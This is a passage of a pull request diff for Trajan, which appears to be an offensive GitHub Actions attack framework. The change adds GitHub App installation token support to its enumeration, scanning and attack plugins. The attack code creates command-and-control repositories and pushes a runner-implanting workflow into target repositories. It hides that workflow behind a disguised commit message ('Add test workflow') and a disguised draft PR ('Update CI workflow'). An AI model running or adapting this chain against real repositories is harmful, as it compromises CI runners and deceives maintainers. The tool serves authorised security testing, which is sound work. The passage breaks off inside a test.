### PR TITLE
feat(github): support GitHub App installation tokens (ghs_) across enumerate, scan, attack

### DIFF
--- a/cmd/trajan/github/attack.go
+++ b/cmd/trajan/github/attack.go
@@ -55,6 +55,7 @@ var (
 	attackChainPlugins []string // Custom chain (ordered plugin list)
 	attackChainList    bool     // List available chains
 	attackChainDeps    bool     // Show chain dependencies
+	attackC2Org        string   // C2 organization for GitHub App installation tokens
 )
 
 var attackCmd = &cobra.Command{
@@ -124,6 +125,7 @@ func init() {
 	attackCmd.Flags().StringVar(&attackPayload, "payload", "", "custom payload file or inline script")
 	attackCmd.Flags().StringVar(&attackBranch, "branch", "", "branch name for PR-based attacks")
 	attackCmd.Flags().StringVar(&attackC2Repo, "c2-repo", "", "C2 repository for runner-on-runner and interactive-shell (owner/repo)")
+	attackCmd.Flags().StringVar(&attackC2Org, "c2-org", "", "C2 organization for GitHub App installation tokens (creates C2 repo in this org)")
 	attackCmd.Flags().StringVar(&attackTargetOS, "target-os", "linux", "target OS for runner-on-runner (linux|win|macos)")
 	attackCmd.Flags().StringVar(&attackTargetArch, "target-arch", "x64", "target architecture for runner-on-runner (x64|arm64)")
 	attackCmd.Flags().StringVar(&attackRunnerLabels, "runner-labels", "self-hosted", "runner labels for runner-on-runner (comma-separated)")
@@ -290,6 +292,9 @@ func runAttack(cmd *cobra.Command, args []string) error {
 	extraOpts := make(map[string]string)
 	if attackC2Repo != "" {
 		extraOpts["c2_repo"] = attackC2Repo
+	}
+	if attackC2Org != "" {
+		extraOpts["c2_org"] = attackC2Org
 	}
 	if attackTargetOS != "" {
 		extraOpts["target_os"] = attackTargetOS

--- a/cmd/trajan/github/enumerate/repos.go
+++ b/cmd/trajan/github/enumerate/repos.go
@@ -161,15 +161,18 @@ func outputReposConsole(result *github.ReposEnumerateResult) error {
 		fmt.Printf("Archived: %d repositories\n", result.Summary.Archived)
 	}
 
-	// Separate repos by permission level (Admin > Write > Read)
-	var adminRepos, writeRepos, readRepos []github.RepositoryWithPermissions
+	// Separate repos by permission level (Admin > Write > Read > unknown)
+	var adminRepos, writeRepos, readRepos, otherRepos []github.RepositoryWithPermissions
 	for _, repo := range result.Repositories {
-		if repo.Permissions.Admin {
+		switch {
+		case repo.Permissions.Admin:
 			adminRepos = append(adminRepos, repo)
-		} else if repo.Permissions.Push {
+		case repo.Permissions.Push:
 			writeRepos = append(writeRepos, repo)
-		} else if repo.Permissions.Pull {
+		case repo.Permissions.Pull:
 			readRepos = append(readRepos, repo)
+		default:
+			otherRepos = append(otherRepos, repo)
 		}
 	}
 
@@ -208,6 +211,20 @@ func outputReposConsole(result *github.ReposEnumerateResult) error {
 				visibility = "private"
 			}
 			fmt.Printf("  • %s/%s [%s, %s]\n",
+				repo.Repository.Owner, repo.Repository.Name, visibility, repo.Repository.DefaultBranch)
+		}
+	}
+
+	// Repos with no reported permission bits — common for GitHub App installation
+	// tokens, whose list endpoint does not return reliable push/pull metadata.
+	if len(otherRepos) > 0 {
+		fmt.Printf("\nAccessible Repositories (%d) [permissions not reported]:\n", len(otherRepos))
+		for _, repo := range otherRepos {
+			visibility := "public"
+			if repo.Repository.Private {
+				visibility = "private"
+			}
+			fmt.Printf("  \u2022 %s/%s [%s, %s]\n",
 				repo.Repository.Owner, repo.Repository.Name, visibility, repo.Repository.DefaultBranch)
 		}
 	}

--- a/cmd/trajan/github/enumerate/repos_test.go
+++ b/cmd/trajan/github/enumerate/repos_test.go
@@ -1,6 +1,9 @@
 package enumerate
 
 import (
+	"io"
+	"os"
+	"strings"
 	"testing"
 
 	"github.com/praetorian-inc/trajan/pkg/github"
@@ -112,6 +115,67 @@ func TestOutputReposConsole(t *testing.T) {
 				t.Errorf("outputReposConsole() returned error: %v", err)
 			}
 		})
+	}
+}
+
+// TestOutputReposConsoleAppTokenNoPermissions verifies that repos with all-false
+// permissions (as returned by GET /installation/repositories for GitHub App tokens)
+// appear in the output rather than being silently dropped.
+func TestOutputReposConsoleAppTokenNoPermissions(t *testing.T) {
+	result := &github.ReposEnumerateResult{
+		Repositories: []github.RepositoryWithPermissions{
+			{
+				Repository: platforms.Repository{
+					Owner:         "trgh-one",
+					Name:          "tc01",
+					DefaultBranch: "main",
+					Private:       true,
+				},
+				// All permission bits are false — typical for GitHub App installation tokens
+				Permissions: github.RepositoryPermissions{
+					Admin: false,
+					Push:  false,
+					Pull:  false,
+				},
+			},
+		},
+		Summary: github.ReposSummary{
+			Total:   1,
+			Private: 1,
+		},
+	}
+
+	// Capture stdout by swapping os.Stdout with a pipe
+	origStdout := os.Stdout
+	r, w, err := os.Pipe()
+	if err != nil {
+		t.Fatalf("os.Pipe() failed: %v", err)
+	}
+	os.Stdout = w
+
+	callErr := outputReposConsole(result)
+
+	// Restore stdout before reading
+	w.Close()
+	os.Stdout = origStdout
+
+	var sb strings.Builder
+	if _, err := io.Copy(&sb, r); err != nil {
+		t.Fatalf("reading captured output: %v", err)
+	}
+	r.Close()
+
+	if callErr != nil {
+		t.Fatalf("outputReposConsole() returned unexpected error: %v", callErr)
+	}
+
+	output := sb.String()
+
+	if !strings.Contains(output, "tc01") {
+		t.Errorf("output does not contain repo name %q; got:\n%s", "tc01", output)
+	}
+	if !strings.Contains(output, "permissions not reported") {
+		t.Errorf("output does not contain %q; got:\n%s", "permissions not reported", output)
 	}
 }
 

--- a/cmd/trajan/github/enumerate/token.go
+++ b/cmd/trajan/github/enumerate/token.go
@@ -146,14 +146,24 @@ func outputTokenConsole(result *github.TokenEnumerateResult) error {
 	info := result.TokenInfo
 
 	// User information
-	fmt.Printf("User: %s", info.User)
-	if info.Name != "" {
-		fmt.Printf(" (%s)", info.Name)
+	if info.User != "" {
+		fmt.Printf("User: %s", info.User)
+		if info.Name != "" {
+			fmt.Printf(" (%s)", info.Name)
+		}
+		fmt.Println()
 	}
-	fmt.Println()
 
 	// Token type
 	fmt.Printf("Type: %s\n", formatTokenType(info.Type))
+
+	// GitHub App installation tokens have no user identity; show installation scope.
+	if info.Type == github.TokenTypeGitHubApp {
+		if result.RepositorySelection != "" {
+			fmt.Printf("Repository selection: %s\n", result.RepositorySelection)
+		}
+		fmt.Printf("Accessible repositories: %d\n", result.AccessibleRepos)
+	}
 
 	// Scopes (for classic PATs)
 	if len(info.Scopes) > 0 {
@@ -208,6 +218,8 @@ func formatTokenType(tokenType github.TokenType) string {
 		return "classic personal access token"
 	case github.TokenTypeFineGrained:
 		return "fine-grained personal access token"
+	case github.TokenTypeGitHubApp:
+		return "GitHub App installation token"
 	default:
 		return "unknown"
 	}

--- a/cmd/trajan/github/enumerate/token_test.go
+++ b/cmd/trajan/github/enumerate/token_test.go
@@ -72,16 +72,22 @@ func TestOutputTokenConsole(t *testing.T) {
 
 func TestFormatTokenType(t *testing.T) {
 	tests := []struct {
+		name      string
 		tokenType github.TokenType
 		want      string
 	}{
-		{github.TokenTypeClassic, "classic personal access token"},
-		{github.TokenTypeFineGrained, "fine-grained personal access token"},
-		{github.TokenTypeUnknown, "unknown"},
+		{"classic", github.TokenTypeClassic, "classic personal access token"},
+		{"fine-grained", github.TokenTypeFineGrained, "fine-grained personal access token"},
+		{"unknown", github.TokenTypeUnknown, "unknown"},
+		{
+			name:      "github app",
+			tokenType: github.TokenTypeGitHubApp,
+			want:      "GitHub App installation token",
+		},
 	}
 
 	for _, tt := range tests {
-		t.Run(string(tt.tokenType), func(t *testing.T) {
+		t.Run(tt.name, func(t *testing.T) {
 			got := formatTokenType(tt.tokenType)
 			if got != tt.want {
 				t.Errorf("formatTokenType() = %v, want %v", got, tt.want)

--- a/cmd/trajan/github/scan.go
+++ b/cmd/trajan/github/scan.go
@@ -104,16 +104,9 @@ func runScan(cmd *cobra.Command, args []string) error {
 	output := cmdutil.GetOutput(cmd)
 
 	// Determine target
-	var target platforms.Target
-	switch {
-	case scanRepo != "":
-		target = platforms.Target{Type: platforms.TargetRepo, Value: scanRepo}
-	case scanOrg != "":
-		target = platforms.Target{Type: platforms.TargetOrg, Value: scanOrg}
-	case scanUser != "":
-		target = platforms.Target{Type: platforms.TargetUser, Value: scanUser}
-	default:
-		return fmt.Errorf("must specify --repo, --org, or --user")
+	target, err := resolveScanTarget(scanRepo, scanOrg, scanUser, t)
+	if err != nil {
+		return err
 	}
 
 	ctx := context.Background()
@@ -134,6 +127,24 @@ func runScan(cmd *cobra.Command, args []string) error {
 	}
 
 	return executeScanAndOutput(ctx, platform, target, verbose, output, scanConcurrency)
+}
+
+// resolveScanTarget picks the scan target from flags. With no flag, GitHub App
+// installation tokens default to "all accessible" (installation repos); other tokens
+// must specify a target.
+func resolveScanTarget(repo, org, user, token string) (platforms.Target, error) {
+	switch {
+	case repo != "":
+		return platforms.Target{Type: platforms.TargetRepo, Value: repo}, nil
+	case org != "":
+		return platforms.Target{Type: platforms.TargetOrg, Value: org}, nil
+	case user != "":
+		return platforms.Target{Type: platforms.TargetUser, Value: user}, nil
+	case github.IsAppToken(token):
+		return platforms.Target{Type: platforms.TargetUser, Value: ""}, nil
+	default:
+		return platforms.Target{}, fmt.Errorf("must specify --repo, --org, or --user")
+	}
 }
 
 // buildPlatformConfig constructs GitHub platform configuration.

--- a/cmd/trajan/github/scan_test.go
+++ b/cmd/trajan/github/scan_test.go
@@ -1,0 +1,23 @@
+package github
+
+import (
+	"testing"
+
+	"github.com/praetorian-inc/trajan/pkg/platforms"
+)
+
+func TestResolveScanTarget_AppTokenNoFlags(t *testing.T) {
+	target, err := resolveScanTarget("", "", "", "ghs_test")
+	if err != nil {
+		t.Fatalf("resolveScanTarget() error = %v", err)
+	}
+	if target.Type != platforms.TargetUser || target.Value != "" {
+		t.Errorf("target = %+v, want all-accessible (TargetUser,\"\")", target)
+	}
+}
+
+func TestResolveScanTarget_UserTokenNoFlags(t *testing.T) {
+	if _, err := resolveScanTarget("", "", "", "ghp_test"); err == nil {
+		t.Error("expected error for user token with no target flags")
+	}
+}

--- a/pkg/github/attacks/c2setup/c2setup.go
+++ b/pkg/github/attacks/c2setup/c2setup.go
@@ -106,11 +106,11 @@ func (p *Plugin) Execute(ctx context.Context, opts attacks.AttackOptions) (*atta
 	client := ghPlatform.Client()
 
 	// Step 4: Create C2 repository
-	repo, err := client.CreateRepository(ctx, github.CreateRepositoryInput{
+	repo, err := createC2Repo(ctx, client, opts, github.CreateRepositoryInput{
 		Name:        repoName,
 		Description: "C2 repository for Trajan attack framework",
 		Private:     true,
-		AutoInit:    true, // Initialize with README to have default branch
+		AutoInit:    true,
 	})
 	if err != nil {
 		result.Success = false
@@ -271,4 +271,18 @@ func (p *Plugin) Provides() []attacks.ContextKey {
 // Requires implements ChainableAttackPlugin
 func (p *Plugin) Requires() []attacks.ContextKey {
 	return nil // No requirements
+}
+
+// createC2Repo creates the C2 repository in the right namespace for the token type.
+// User tokens => personal namespace (/user/repos). App installation tokens have no user
+// namespace, so they require an explicit --c2-org and create via /orgs/{org}/repos.
+func createC2Repo(ctx context.Context, client *github.Client, opts attacks.AttackOptions, input github.CreateRepositoryInput) (*github.Repository, error) {
+	if client.IsGitHubAppToken() {
+		org := opts.ExtraOpts["c2_org"]
+		if org == "" {
+			return nil, fmt.Errorf("installation token has no user namespace; pass --c2-org <org> (requires Administration:write and the app installed there) or use a user PAT")
+		}
+		return client.CreateOrgRepository(ctx, org, input)
+	}
+	return client.CreateRepository(ctx, input)
 }

--- a/pkg/github/attacks/c2setup/c2setup_test.go
+++ b/pkg/github/attacks/c2setup/c2setup_test.go
@@ -2,12 +2,14 @@ package c2setup
 
 import (
 	"context"
+	"strings"
 	"testing"
 
 	"github.com/stretchr/testify/assert"
 
 	"github.com/praetorian-inc/trajan/pkg/attacks"
 	"github.com/praetorian-inc/trajan/pkg/detections"
+	"github.com/praetorian-inc/trajan/pkg/github"
 	"github.com/praetorian-inc/trajan/pkg/platforms"
 )
 
@@ -121,4 +123,31 @@ func TestExecute_InvalidPlatform(t *testing.T) {
 	assert.Error(t, err)
 	assert.False(t, result.Success)
 	assert.Equal(t, "platform is not GitHub", result.Message)
+}
+
+func newC2AppPlatform(t *testing.T, url string) *github.Platform {
+	t.Helper()
+	p := github.NewPlatform()
+	if err := p.Init(context.Background(), platforms.Config{BaseURL: url, Token: "ghs_test"}); err != nil {
+		t.Fatalf("Init() error = %v", err)
+	}
+	return p
+}
+
+func TestC2Setup_AppToken_RequiresC2Org(t *testing.T) {
+	p := newC2AppPlatform(t, "https://api.github.com")
+	res, err := New().Execute(context.Background(), attacks.AttackOptions{
+		Platform:  p,
+		Target:    platforms.Target{Type: platforms.TargetRepo, Value: "acme/x"},
+		ExtraOpts: map[string]string{}, // no c2_org
+	})
+	if err == nil {
+		t.Fatal("expected error when --c2-org missing for app token")
+	}
+	if res.Success {
+		t.Error("Success should be false")
+	}
+	if !strings.Contains(res.Message, "c2-org") {
+		t.Errorf("message %q should mention --c2-org", res.Message)
+	}
 }

--- a/pkg/github/attacks/runneronrunner/runneronrunner.go
+++ b/pkg/github/attacks/runneronrunner/runneronrunner.go
@@ -82,6 +82,14 @@ func (p *Plugin) Execute(ctx context.Context, opts attacks.AttackOptions) (*atta
 	runnerLabels := getOrDefault(opts.ExtraOpts, "runner_labels", "self-hosted")
 	keepAlive := opts.ExtraOpts["keep_alive"] == "true"
 
+	// Fail fast: app tokens have no user namespace, require explicit C2 repo
+	isApp := client.IsGitHubAppToken()
+	if isApp && c2Repo == "" {
+		result.Success = false
+		result.Message = "installation token requires an explicit C2 repo: pass --c2-repo <owner>/<repo> (GitHub App tokens have no user namespace and cannot create one)"
+		return result, fmt.Errorf("missing --c2-repo for installation token")
+	}
+
 	// Validate target repository uses self-hosted runners
 	hasSelfHosted, err := checkForSelfHostedRunners(ctx, client, owner, repo)
 	if err != nil {
@@ -139,101 +147,83 @@ func (p *Plugin) Execute(ctx context.Context, opts attacks.AttackOptions) (*atta
 		URL:         gistURL,
 	})
 
-	// Step 3: Fork target repository
-	fork, err := client.ForkRepository(ctx, owner, repo)
-	if err != nil {
-		result.Success = false
-		result.Message = fmt.Sprintf("failed to fork repository: %v", err)
-		return result, err
+	// Step 3-6: Token-aware delivery — app tokens push directly into target; user tokens fork.
+	var headOwner, headRepo, prHead string
+	branchName := fmt.Sprintf("trajan-ror-%s", opts.SessionID)
+
+	if isApp {
+		headOwner, headRepo = owner, repo
+		prHead = branchName // same-repo head
+	} else {
+		fork, err := client.ForkRepository(ctx, owner, repo)
+		if err != nil {
+			result.Success = false
+			result.Message = fmt.Sprintf("failed to fork repository: %v", err)
+			return result, err
+		}
+		result.Artifacts = append(result.Artifacts, attacks.Artifact{
+			Type: attacks.ArtifactRepository, Identifier: fork.FullName,
+			Description: "Forked repository", URL: fork.HTMLURL,
+		})
+		time.Sleep(5 * time.Second)
+		headOwner, headRepo = fork.Owner.Login, fork.Name
+		prHead = fmt.Sprintf("%s:%s", fork.Owner.Login, branchName)
 	}
 
-	result.Artifacts = append(result.Artifacts, attacks.Artifact{
-		Type:        attacks.ArtifactRepository,
-		Identifier:  fork.FullName,
-		Description: "Forked repository",
-		URL:         fork.HTMLURL,
-	})
-
-	// Wait for fork to be ready
-	time.Sleep(5 * time.Second)
-
-	// Step 4: Create attack branch in fork
-	branchName := fmt.Sprintf("trajan-ror-%s", opts.SessionID)
-	defaultBranch, err := common.GetDefaultBranch(ctx, client, fork.Owner.Login, fork.Name)
+	defaultBranch, err := common.GetDefaultBranch(ctx, client, headOwner, headRepo)
 	if err != nil {
 		result.Success = false
 		result.Message = fmt.Sprintf("failed to get default branch: %v", err)
 		return result, err
 	}
-	branchSHA, err := common.GetBranchSHA(ctx, client, fork.Owner.Login, fork.Name, defaultBranch)
+	branchSHA, err := common.GetBranchSHA(ctx, client, headOwner, headRepo, defaultBranch)
 	if err != nil {
 		result.Success = false
 		result.Message = fmt.Sprintf("failed to get branch SHA: %v", err)
 		return result, err
 	}
-
-	_, err = client.CreateBranch(ctx, fork.Owner.Login, fork.Name, branchName, branchSHA)
-	if err != nil {
+	if _, err = client.CreateBranch(ctx, headOwner, headRepo, branchName, branchSHA); err != nil {
 		result.Success = false
-		result.Message = fmt.Sprintf("failed to create branch: %v", err)
+		result.Message = fmt.Sprintf("failed to create branch (installation may lack Contents:write): %v", err)
 		return result, err
 	}
-
 	result.Artifacts = append(result.Artifacts, attacks.Artifact{
-		Type:        attacks.ArtifactBranch,
-		Identifier:  branchName,
-		Description: "Attack branch in fork",
+		Type: attacks.ArtifactBranch, Identifier: branchName, Description: "Attack branch",
 	})
 
-	// Step 5: Deploy RoR workflow to fork
 	rorWorkflow := common.RoRWorkflowPayload(gistURL, runnerLabels, targetOS)
 	workflowPath := ".github/workflows/trajan-ror.yml"
-	_, err = client.CreateOrUpdateFile(ctx, fork.Owner.Login, fork.Name, workflowPath,
-		github.FileContentInput{
-			Message: "Add test workflow",
-			Content: common.EncodeBase64(rorWorkflow),
-			Branch:  branchName,
-		})
-	if err != nil {
+	if _, err = client.CreateOrUpdateFile(ctx, headOwner, headRepo, workflowPath,
+		github.FileContentInput{Message: "Add test workflow", Content: common.EncodeBase64(rorWorkflow), Branch: branchName}); err != nil {
 		result.Success = false
-		result.Message = fmt.Sprintf("failed to deploy workflow: %v", err)
+		result.Message = fmt.Sprintf("failed to deploy workflow (installation may lack Contents:write): %v", err)
 		return result, err
 	}
-
 	result.Artifacts = append(result.Artifacts, attacks.Artifact{
-		Type:        attacks.ArtifactWorkflow,
-		Identifier:  workflowPath,
-		Description: "RoR workflow deployed",
-		URL:         fmt.Sprintf("%s/blob/%s/%s", fork.HTMLURL, branchName, workflowPath),
+		Type: attacks.ArtifactWorkflow, Identifier: workflowPath, Description: "RoR workflow deployed",
 	})
 
-	// Step 6: Create pull request to target
 	pr, err := client.CreatePullRequest(ctx, owner, repo, github.PullRequestInput{
-		Title: "Update CI workflow",
-		Body:  "CI improvements",
-		Head:  fmt.Sprintf("%s:%s", fork.Owner.Login, branchName),
-		Base:  defaultBranch,
-		Draft: true,
+		Title: "Update CI workflow", Body: "CI improvements", Head: prHead, Base: defaultBranch, Draft: true,
 	})
 	if err != nil {
 		result.Success = false
-		result.Message = fmt.Sprintf("failed to create PR: %v", err)
+		result.Message = fmt.Sprintf("failed to create PR (installation may lack Pull-requests:write): %v", err)
 		return result, err
 	}
-
 	result.Artifacts = append(result.Artifacts, attacks.Artifact{
-		Type:        attacks.ArtifactPR,
-		Identifier:  fmt.Sprintf("%d", pr.Number),
-		URL:         pr.HTMLURL,
-		Description: "Attack PR created",
+		Type: attacks.ArtifactPR, Identifier: fmt.Sprintf("%d", pr.Number), URL: pr.HTMLURL, Description: "Attack PR created",
 	})
 
 	// Step 7: Parse C2 repo owner/name
 	c2Parts := strings.Split(c2Repo, "/")
 	var c2Owner, c2RepoName string
 	if len(c2Parts) == 2 {
-		c2Owner = c2Parts[0]
-		c2RepoName = c2Parts[1]
+		c2Owner, c2RepoName = c2Parts[0], c2Parts[1]
+	} else if isApp {
+		result.Success = false
+		result.Message = "installation token requires --c2-repo in owner/repo form"
+		return result, fmt.Errorf("invalid --c2-repo for installation token")
 	} else {
 		// Get authenticated user
 		user, err := client.GetUser(ctx)
@@ -242,8 +232,7 @@ func (p *Plugin) Execute(ctx context.Context, opts attacks.AttackOptions) (*atta
 			result.Message = fmt.Sprintf("failed to get authenticated user: %v", err)
 			return result, err
 		}
-		c2Owner = user.Login
-		c2RepoName = c2Repo
+		c2Owner, c2RepoName = user.Login, c2Repo
 	}
 
 	// Step 8: Poll for runner connection
@@ -256,18 +245,13 @@ func (p *Plugin) Execute(ctx context.Context, opts attacks.AttackOptions) (*atta
 
 	// Step 9: Cleanup gist after successful implant
 	cleanupActions := []attacks.CleanupAction{
-		{
-			Type:        attacks.ArtifactPR,
-			Identifier:  fmt.Sprintf("%d", pr.Number),
-			Action:      "close",
-			Description: "Close attack PR",
-		},
-		{
-			Type:        attacks.ArtifactRepository,
-			Identifier:  fork.FullName,
-			Action:      "delete",
-			Description: "Delete fork",
-		},
+		{Type: attacks.ArtifactPR, Identifier: fmt.Sprintf("%d", pr.Number), Action: "close", Description: "Close attack PR"},
+	}
+	if !isApp {
+		cleanupActions = append(cleanupActions, attacks.CleanupAction{
+			Type: attacks.ArtifactRepository, Identifier: fmt.Sprintf("%s/%s", headOwner, headRepo),
+			Action: "delete", Description: "Delete fork",
+		})
 	}
 
 	// Only cleanup C2 repo if we created it

--- a/pkg/github/attacks/runneronrunner/runneronrunner_test.go
+++ b/pkg/github/attacks/runneronrunner/runneronrunner_test.go
@@ -1,12 +1,16 @@
 package runneronrunner
 
 import (
+	"context"
+	"strings"
 	"testing"
 
 	"github.com/stretchr/testify/assert"
 
 	"github.com/praetorian-inc/trajan/pkg/attacks"
 	"github.com/praetorian-inc/trajan/pkg/detections"
+	"github.com/praetorian-inc/trajan/pkg/github"
+	"github.com/praetorian-inc/trajan/pkg/platforms"
 )
 
 func TestRunnerOnRunner_CanAttack(t *testing.T) {
@@ -74,4 +78,22 @@ func TestRunnerOnRunner_New(t *testing.T) {
 	assert.NotNil(t, plugin)
 	assert.Equal(t, "runner-on-runner", plugin.Name())
 	assert.Equal(t, "github", plugin.Platform())
+}
+
+func TestRoR_AppToken_RequiresC2Repo(t *testing.T) {
+	p := github.NewPlatform()
+	if err := p.Init(context.Background(), platforms.Config{BaseURL: "https://api.github.com", Token: "ghs_test"}); err != nil {
+		t.Fatalf("Init() error = %v", err)
+	}
+	res, err := New().Execute(context.Background(), attacks.AttackOptions{
+		Platform:  p,
+		Target:    platforms.Target{Type: platforms.TargetRepo, Value: "acme/x"},
+		ExtraOpts: map[string]string{}, // no c2_repo
+	})
+	if err == nil {
+		t.Fatal("expected error when --c2-repo missing for app token")
+	}
+	if res.Success || !strings.Contains(res.Message, "c2-repo") {
+		t.Errorf("message %q should require --c2-repo; success=%v", res.Message, res.Success)
+	}
 }

--- a/pkg/github/client_write.go
+++ b/pkg/github/client_write.go
@@ -503,6 +503,36 @@ func (c *Client) CreateRepository(ctx context.Context, input CreateRepositoryInp
 	return &repo, nil
 }
 
+// CreateOrgRepository creates a repository in an organization.
+// Works with GitHub App installation tokens that have Administration: write on the org.
+// Returns an *APIError (so IsPermissionDenied applies) on 403/404.
+func (c *Client) CreateOrgRepository(ctx context.Context, org string, input CreateRepositoryInput) (*Repository, error) {
+	path := fmt.Sprintf("/orgs/%s/repos", org)
+
+	body, err := json.Marshal(input)
+	if err != nil {
+		return nil, fmt.Errorf("marshaling repo input: %w", err)
+	}
+
+	resp, err := c.doWrite(ctx, http.MethodPost, path, bytes.NewReader(body))
+	if err != nil {
+		return nil, err
+	}
+	defer resp.Body.Close()
+
+	if resp.StatusCode != http.StatusCreated {
+		respBody, _ := io.ReadAll(resp.Body)
+		return nil, &APIError{StatusCode: resp.StatusCode, Message: string(respBody),
+			Resource: "repository", Scope: "org", Target: org}
+	}
+
+	var repo Repository
+	if err := json.NewDecoder(resp.Body).Decode(&repo); err != nil {
+		return nil, fmt.Errorf("decoding repository response: %w", err)
+	}
+	return &repo, nil
+}
+
 // DeleteRepository deletes a repository
 func (c *Client) DeleteRepository(ctx context.Context, owner, repo string) error {
 	path := fmt.Sprintf("/repos/%s/%s", owner, repo)

--- a/pkg/github/client_write_test.go
+++ b/pkg/github/client_write_test.go
@@ -699,6 +699,40 @@ func TestRemoveCollaborator_NotFound(t *testing.T) {
 	assert.Contains(t, err.Error(), "404")
 }
 
+func TestClient_CreateOrgRepository(t *testing.T) {
+	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.URL.Path != "/orgs/acme/repos" || r.Method != http.MethodPost {
+			t.Errorf("got %s %s, want POST /orgs/acme/repos", r.Method, r.URL.Path)
+		}
+		w.WriteHeader(http.StatusCreated)
+		_, _ = w.Write([]byte(`{"name":"c2","full_name":"acme/c2","owner":{"login":"acme","type":"Organization"}}`))
+	}))
+	defer server.Close()
+
+	client := NewClient(server.URL, "ghs_test")
+	repo, err := client.CreateOrgRepository(context.Background(), "acme", CreateRepositoryInput{Name: "c2", Private: true})
+	if err != nil {
+		t.Fatalf("CreateOrgRepository() error = %v", err)
+	}
+	if repo.FullName != "acme/c2" {
+		t.Errorf("FullName = %q, want acme/c2", repo.FullName)
+	}
+}
+
+func TestClient_CreateOrgRepository_PermissionDenied(t *testing.T) {
+	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusForbidden)
+		_, _ = w.Write([]byte(`{"message":"Resource not accessible by integration"}`))
+	}))
+	defer server.Close()
+
+	client := NewClient(server.URL, "ghs_test")
+	_, err := client.CreateOrgRepository(context.Background(), "acme", CreateRepositoryInput{Name: "c2"})
+	if err == nil || !IsPermissionDenied(err) {
+		t.Errorf("err = %v, want IsPermissionDenied", err)
+	}
+}
+
 func TestCreateRepository_Error(t *testing.T) {
 	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
 		w.Header().Set("X-RateLimit-Remaining", "4999")

--- a/pkg/github/enumerate.go
+++ b/pkg/github/enumerate.go
@@ -23,16 +23,36 @@ func (p *Platform) EnumerateToken(ctx context.Context) (*TokenEnumerateResult, e
 	}
 	result.TokenInfo = tokenInfo
 
-	// Get organizations (reuses existing method)
-	orgs, err := p.client.ListAuthenticatedUserOrgs(ctx)
-	if err != nil {
-		result.Errors = append(result.Errors, fmt.Errorf("listing organizations: %w", err))
+	if tokenInfo.Type == TokenTypeGitHubApp {
+		repos, selection, err := p.client.ListInstallationRepos(ctx)
+		if err != nil {
+			result.Errors = append(result.Errors, fmt.Errorf("listing installation repos: %w", err))
+		} else {
+			result.AccessibleRepos = len(repos)
+			result.RepositorySelection = selection
+			// An installation lives on ONE account. Surface it as an org only when
+			// owner.type == "Organization" (it may be a personal user account).
+			seen := make(map[string]bool)
+			for i := range repos {
+				owner := repos[i].Owner
+				if owner.Type == "Organization" && !seen[owner.Login] {
+					seen[owner.Login] = true
+					result.Organizations = append(result.Organizations, OrganizationInfo{Name: owner.Login})
+				}
+			}
+		}
 	} else {
-		result.Organizations = make([]OrganizationInfo, len(orgs))
-		for i, org := range orgs {
-			result.Organizations[i] = OrganizationInfo{
-				Name: org.Login,
-				// URL and Role can be enhanced later with additional API calls
+		// Get organizations (reuses existing method)
+		orgs, err := p.client.ListAuthenticatedUserOrgs(ctx)
+		if err != nil {
+			result.Errors = append(result.Errors, fmt.Errorf("listing organizations: %w", err))
+		} else {
+			result.Organizations = make([]OrganizationInfo, len(orgs))
+			for i, org := range orgs {
+				result.Organizations[i] = OrganizationInfo{
+					Name: org.Login,
+					// URL and Role can be enhanced later with additional API calls
+				}
 			}
 		}
 	}
@@ -184,6 +204,16 @@ func parseRepoSlug(slug string) []string {
 // enumerateAllAccessibleRepos gets all repos accessible to authenticated user
 // by combining direct repos + repos from all organizations
 func (p *Platform) enumerateAllAccessibleRepos(ctx context.Context) ([]Repository, error) {
+	// GitHub App installation tokens have no user/orgs; the installation's repo set
+	// IS the full accessible scope.
+	if p.client.IsGitHubAppToken() {
+		repos, _, err := p.client.ListInstallationRepos(ctx)
+		if err != nil {
+			return nil, fmt.Errorf("listing installation repos: %w", err)
+		}
+		return repos, nil
+	}
+
 	// Get organizations user belongs to FIRST
 	orgs, err := p.client.ListAuthenticatedUserOrgs(ctx)
 	if err != nil {

--- a/pkg/github/enumerate_test.go
+++ b/pkg/github/enumerate_test.go
@@ -1,0 +1,71 @@
+package github
+
+import (
+	"context"
+	"fmt"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+
+	"github.com/praetorian-inc/trajan/pkg/platforms"
+)
+
+func TestPlatform_EnumerateToken_GitHubApp(t *testing.T) {
+	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.URL.Path == "/user" || r.URL.Path == "/user/orgs" {
+			t.Errorf("app token must not call %s", r.URL.Path)
+		}
+		w.Header().Set("Content-Type", "application/json")
+		w.WriteHeader(http.StatusOK)
+		fmt.Fprint(w, `{"total_count":2,"repository_selection":"all","repositories":[
+			{"name":"a","owner":{"login":"acme","type":"Organization"}},
+			{"name":"b","owner":{"login":"acme","type":"Organization"}}]}`)
+	}))
+	defer server.Close()
+
+	p := NewPlatform()
+	if err := p.Init(context.Background(), platforms.Config{BaseURL: server.URL, Token: "ghs_test"}); err != nil {
+		t.Fatalf("Init() error = %v", err)
+	}
+	result, err := p.EnumerateToken(context.Background())
+	if err != nil {
+		t.Fatalf("EnumerateToken() error = %v", err)
+	}
+	if result.TokenInfo == nil || result.TokenInfo.Type != TokenTypeGitHubApp {
+		t.Fatalf("token type not github_app: %+v", result.TokenInfo)
+	}
+	if result.AccessibleRepos != 2 {
+		t.Errorf("AccessibleRepos = %d, want 2", result.AccessibleRepos)
+	}
+	if result.RepositorySelection != "all" {
+		t.Errorf("RepositorySelection = %q, want all", result.RepositorySelection)
+	}
+	if len(result.Organizations) != 1 || result.Organizations[0].Name != "acme" {
+		t.Errorf("Organizations = %+v, want [acme]", result.Organizations)
+	}
+}
+
+func TestPlatform_EnumerateRepos_GitHubAppSelf(t *testing.T) {
+	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.URL.Path == "/user/orgs" || r.URL.Path == "/user/repos" {
+			t.Errorf("app token must not call %s", r.URL.Path)
+		}
+		w.Header().Set("Content-Type", "application/json")
+		w.WriteHeader(http.StatusOK)
+		fmt.Fprint(w, `{"total_count":1,"repository_selection":"selected","repositories":[
+			{"name":"a","owner":{"login":"acme","type":"Organization"},"private":true}]}`)
+	}))
+	defer server.Close()
+
+	p := NewPlatform()
+	if err := p.Init(context.Background(), platforms.Config{BaseURL: server.URL, Token: "ghs_test"}); err != nil {
